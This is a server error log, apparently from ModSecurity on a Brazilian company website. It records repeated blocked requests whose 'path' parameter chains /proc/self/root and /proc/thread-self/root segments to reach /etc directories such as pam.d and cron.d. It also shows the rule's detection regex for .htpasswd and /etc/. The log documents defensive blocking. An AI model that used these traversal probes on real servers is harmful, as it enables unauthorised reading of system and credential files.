https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:09.760041 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:59016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutReoXxyEfFpUF8f_h4gAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:10.844038 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:41672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutRvu8EFLIOrSqIptvigAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:11.103345 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:59030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutR-yqAr6etmhZHNo0ywAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:12.444588 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:59040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutSAbLMZ6AikZjR9UupgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:13.657457 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:36536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutSQkwaGbbGflqUZCGtAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:14.940954 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.241.31:36548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutSv-YZRR_7pZ7nDJeiwAAA8w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:16.250785 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:36562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutTBkFeYa1D6dYQnC_rAAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:18.680716 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:60534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutTta6ubjKNq_cu4YTWQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:21.139480 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:59050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutUda6ubjKNq_cu4YTXwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:22.179390 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.241.31:60550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutUl_V7PWP6ixUYl6NAwAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:23.503822 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:35816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutU_-YZRR_7pZ7nDJejgAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:23.539812 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.241.31:60556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutU_-YZRR_7pZ7nDJejwAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:27.875252 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:35822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutV1_V7PWP6ixUYl6NCAAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:29.583392 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:60560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutWRkFeYa1D6dYQnC_vAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:31.660389 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:50796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutW-oXxyEfFpUF8f_h6gAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:34.095875 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.241.31:50802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutXhkFeYa1D6dYQnC_wAAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:01:43.385647 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:35836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutZgkwaGbbGflqUZCG1wAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:46.162605 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.243.128:45662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutav-YZRR_7pZ7nDJenAAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:50.723876 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:45672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutbhkFeYa1D6dYQnC_0QAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:54.935489 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:41568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutcgbLMZ6AikZjR9UuwQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:56.223104 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:41580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutdF_V7PWP6ixUYl6NGgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:01:58.835451 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:41582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abutdv-YZRR_7pZ7nDJeoQAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
